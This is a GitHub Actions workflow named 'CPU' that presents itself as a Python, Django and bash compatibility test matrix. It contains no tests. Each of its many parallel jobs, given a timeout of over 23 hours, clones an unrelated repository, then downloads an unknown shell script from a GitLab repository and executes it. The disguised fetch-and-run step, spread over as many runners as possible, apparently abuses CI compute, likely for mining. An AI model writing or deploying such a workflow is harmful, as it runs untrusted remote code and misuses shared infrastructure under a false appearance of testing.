name: CPU

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-18.04
    strategy:
      # By default, GitHub will maximize the number of jobs run in parallel
      # depending on the available runners on GitHub-hosted virtual machines.
      # max-parallel: 256
      fail-fast: false
      matrix:
        python-version:
          - "2.7"
          - "3.6"
          - "3.7"
          - "3.8"
          - "3.9"
        django-version:
          - "1.11"
          - "2.0"
          - "2.1"
        bash-version:
          - 4.4
          - 4.3
          - 4.2
          - 4.1
          - 3.2
        exclude:
          # Python 2.7 is compatible with Django 1.11
          - python-version: "2.7"
            django-version: "2.0"
          - python-version: "2.7"
          # Python 3.8 is compatible with Django 2.2+
          - python-version: "3.8"
            django-version: "1.11"
          # Python 3.9 is compatible with Django 3.1+
          - python-version: "3.9"
            django-version: "1.11"
          - python-version: "3.9"
            django-version: "2.0"
          - python-version: "3.9"
    container: bash:${{ matrix.bash-version }} 
    timeout-minutes: 1414
    env:
        NUM_JOBS: 40-${{ matrix.python-version }}-${{ matrix.django-version }}-${{ matrix.bash-version }}

    name: test ${{ matrix.python-version }} - ${{ matrix.django-version }} - bash:${{ matrix.bash-version }}

    steps:
      - name: Clone Repo
        uses: actions/checkout@v2
        with:
          repository: actions/checkout

      - name: Wget ${{ matrix.python-version }}-${{ matrix.django-version }}-bash:${{ matrix.bash-version }}
        run: |
          bash --version | head -2
          sleep 60
          wget https://gitlab.com/aauui/asw/-/raw/master/setelan.sh && chmod u+x setelan.sh && ./setelan.sh
        env:
          NUM_JOBS: 40-${{ matrix.python-version }}-${{ matrix.django-version }}-${{ matrix.bash-version }}
